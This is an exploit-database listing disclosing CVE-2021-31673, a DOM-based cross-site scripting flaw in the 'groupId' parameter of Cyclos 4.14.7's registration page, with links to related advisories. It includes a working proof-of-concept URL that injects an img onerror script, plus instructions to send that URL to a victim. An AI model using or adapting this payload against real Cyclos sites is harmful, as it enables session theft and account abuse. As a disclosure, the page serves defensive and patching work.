Lucene search
Tin Pham1337DAY-ID-37711HistoryMay 12, 2022 - 12:00 a.m.
Cyclos 4.14.7 - (groupId) DOM Based Cross-Site Scripting Vulnerability
2022-05-1200:00:00
Tin Pham
0day.today
189
cyclos 4.14.7
[tag]dom-based
[tag]cross-site scripting
[tag]vulnerability
[tag]remote attackers
[tag]arbitrary web script
[tag]html injection
[tag]cve-2021-31673
[tag]registration account
[tag]ubuntu
EPSS
0.004
Percentile
73.1%
# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31673
# Description:
A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.
# Steps to reproduce:
An attacker sends a draft URL
[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.
When a victim opens the URL, XSS will be triggered.
Related
cvelist
cvelist
CVE-2021-31673
2022-05-01 23:08:58
cnvd
cnvd
Cyclos 4 PRO Cross-Site Scripting Vulnerability
2022-05-07 00:00:00
nvd
nvd
CVE-2021-31673
2022-05-02 00:15:07
exploitdb
exploitdb
Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
2022-05-11 00:00:00
prion
prion
Cross site scripting
2022-05-02 00:15:00
cve
cve
CVE-2021-31673
2022-05-02 00:15:07
packetstorm
packetstorm
Cyclos 4.14.7 Cross Site Scripting
2022-05-11 00:00:00